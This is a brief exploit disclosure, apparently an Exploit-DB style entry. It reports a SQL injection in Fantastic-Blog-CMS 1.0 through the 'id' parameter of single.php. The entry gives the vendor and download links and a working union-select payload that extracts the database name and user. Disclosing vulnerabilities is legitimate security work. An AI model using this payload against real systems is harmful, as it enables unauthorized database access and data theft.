- Exploit Title: Fantastic-Blog-CMS 1.0-SQL Injection
- VULNERABLE: An attacker can inject query in "/fantasticblog/single.php" via the "id=5" parameters.
- Vendor Homepage:https://www.sourcecodester.com/php/12258/fantastic-blog-cms-php.html
- Software Link:https: https://www.sourcecodester.com/download-code?nid=12258&title=Fantastic+Blog+%28CMS%29+in+PHP+with+Source+Code
- Version: 1.0
- Vulnerable file: single.php
- Vulnerability proof : payload:id=' union select 1,database(),3,user(),5,6,7,8,9--+-


